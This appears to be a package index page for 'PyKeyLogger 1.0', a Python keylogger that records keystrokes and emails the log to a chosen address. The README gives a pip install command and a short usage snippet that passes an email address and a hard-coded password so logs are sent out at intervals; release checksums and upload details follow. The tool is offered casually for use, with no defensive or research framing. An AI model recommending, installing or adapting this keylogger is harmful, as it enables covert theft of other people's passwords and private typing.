# A simple keylogger
#### This is a simple keylogger that is built using the libraries: pynput and stmplib, #### and some other built-in modules for sending emails. #### It will record the key and send the log to you through email
## How to install it?
You can do:
“”” pip install Pykeylogger “””
to install pykeylogger…
## How to use it?
code example:
“”” from Pykeylogger import keylogger
logger = keylogger.KeyLogger(interval=50, email=”pykeylogger@pykeylogger.com”, passwd=”Pykeylogger123”) logger.run() “””
simple! interval = how long do you want to wait to send the log of the keys to you email = the email you want to send to log to passwd = password of the email
yeyeyeye! Thank you!
Release files for PyKeyLogger 1.0
For a detailed explanation of source distributions (sdists) and built distributions (wheels), please see the package formats documentation.
Source distribution (sdist)
| File | Size | Uploaded | |
|---|---|---|---|
| PyKeyLogger-1.0.tar.gz | 1.1 kB | Details |
Release files / PyKeyLogger-1.0.tar.gz
| Download URL | PyKeyLogger-1.0.tar.gz |
|---|---|
| Size | 1.1 kB |
| Tags | Source |
|
SHA-256 checksum How to use checksums |
a7bf6571951f368bf12a3226645bd0a1a3aa69ef8cdaa8e62e62e59201f80b32
|
|
BLAKE2b-256 checksum How to use checksums |
f4a0f87c492f874ad01d9c12316774d827bc891b53090164c5b7d5ad697d5e10
|
| Upload date | |
|
Uploaded using Trusted Publishing? What is trusted publishing? |
No |
| Uploaded via |
twine/3.2.0 pkginfo/1.5.0.1 requests/2.22.0 setuptools/46.0.0.post20200309 requests-toolbelt/0.9.1 tqdm/4.42.1 CPython/3.7.6
|